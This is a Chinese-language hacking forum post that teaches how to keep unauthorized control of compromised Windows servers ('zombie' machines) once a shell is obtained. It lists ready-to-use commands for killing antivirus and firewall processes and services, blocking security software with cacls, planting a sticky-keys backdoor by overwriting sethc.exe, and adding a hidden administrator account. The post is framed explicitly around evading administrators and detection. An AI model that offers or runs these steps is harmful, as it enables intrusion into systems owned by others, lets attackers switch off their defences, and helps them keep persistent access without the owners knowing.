當各位搞到一個shell， 或者能遠程執行命令之后， 如何提權并保持肉雞長期上線是一個難題。 本人僅根據個人經驗， 旁敲側擊的談幾個常用命令， 算是拋磚引玉， 歡迎大家前來指導交流!

　　首先， 提一下搞肉雞， 方法很多， 1433、135、21， 80、3389、4389， 5900等端口都是常用的(有興趣的可以下載專門的掃描器或者s掃描器)。

　　另外， 說一下肉雞的系統環境， 一般都是服務器， 所以殺毒軟件、防火墻啥的相對來說還是比較牢固的， 所以如何干擾并跳過這些保護也就是提權的關鍵。

　　最后， 如何保持這個肉雞長久上線， 是目的所在， 顯然需要設置后門或者種植木馬。

　　注：下文對喜歡3389直接遠程登陸的用戶不適用(不過善意提醒你， 你留下了登陸等很多日志， 呵呵);

　　常見命令， 如ipconfig、netstat等這兒不涉及， 大家都會。

　　下面轉入正文。

　　1.ver

　　作用：查看系統版本

　　實例：ver

　　說明：提權第一步就是查看這個是個人機器還是服務。

　　2.tasklist

　　作用：列出機器的所有進程

　　實例：tasklist

　　說明：用它你就可以知道肉雞的殺毒軟件、防火墻是啥。 后面就好辦了， 給他中馬的時候， 首先本地測試， 免殺， 再種上去， 防止中馬不成功， 或者留下查殺記錄。 (笨的辦法可以直接停止殺毒軟件， 見后面命令。 不過這樣管理員就肯定知道自己中木馬了， 你長久控制肉雞的目標也就要破碎了)。

　　3.taskkill

　　作用：殺制定名字或者pid的進程

　　實例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389

　　說明：使用它可以結束防火墻進程啥的。 因為它阻止你打開網絡端口， 或者以這臺肉雞為代理進行其他掃描、入侵啥的。 當然， 也可以結束殺毒軟件等。

　　4.net start

　　作用：列出機器所有服務或者啟動某個指定的服務

　　實例: net start 或者 net start w3svc(啟動iis)

　　說明:通過它列出的所有服務可以看到服務器安裝的殺毒軟件， 以及開放哪些服務。 比如有瑞星服務， 則你單獨用taskkill是無法結束殺毒進程的， 只能先停止服務。

　　比如有 Terminal Services則可以通過net u_ser(_去掉， 因為華夏屏蔽)增加一個帳號， 再3389登陸。

　　5.net stop

　　作用：停止指定的服務

　　實例: net stop net stop sharedaccess (停止windows防火墻)

　　說明：結合net start使用

6.cacls

　　作用：設置文件權限

　　實例: cacls c:\windows\mm.exe /P everyone:R 或者cacls c:\progra~1\rising\ravmond.exe /d:everyone

　　說明：可以用它來保護木馬文件或者禁止某個程序(如殺毒軟件)運行。 這個在有時候， 我們taskkill某個進程， 發現馬上又起來了比較有用。

　　設置為/d:everyone,任何人無法訪問， 自然沒法再運行。 (這一招也可以用來殺木馬或者免疫：可參看http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html)

　　7.&

　　作用:連續執行多個命令

　　實例:del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

　　說明：上面是最簡單的shift按多次后跳出資源管理器下后門。 直接拷貝一次執行即可， 不用批處理拉。

　　注：上面操作， 你如果一步一步操作， 早就被系統還原了， 沒法實現文件替換、設置后門。

　　8.echo y

　　作用:當命令行執行碰到提示“是否確定(Y/N)?”的時候自動輸入Y(因為你沒法一邊執行命令一邊還可以選擇y 或n)

　　實例：echo y>echo y>cacls c:\windows\mm.exe /P everyone:R;

　　說明：將上面shift按多次后門簡化：echo y copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & echo y copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

　　(直接拷貝的時候會提示是否覆蓋， 這兒通過echo y解決)

　　9.net us_er/group(_去掉， 因為華夏屏蔽)

　　作用：開帳號， 并加入到組(一般是administrators組)

　　實例：net u_ser admin$ "123456" & net local_group administrators admin$ /add

　　說明：以上通過 &操作符又是一步到位。 另外， 通過這種方法建立的帳號， 僅一次隱藏。 如長期隱藏， 可參考:http://hi.baidu.com/it%5Fsecurity/blog/item/9bab86a0a60fac8d471064b5.html

　　10.shutdown

　　作用：重啟或者關閉機器， 或者取消關機

　　實例：shutdown -r -t 0(立即重啟)

　　說明：該重啟的時候重啟吧， 一般開服務或者中馬之后。

　　以上命令有些2000下可能無法運行， xp， 2003下肯定ok。

　　后續， 我再總結一下如何通過命令行來中馬。

　　主要是通過ftp或者http下載或傳輸文件(完全命令行方式)， 同時也呼吁大家多共享自己得經驗， 共同提高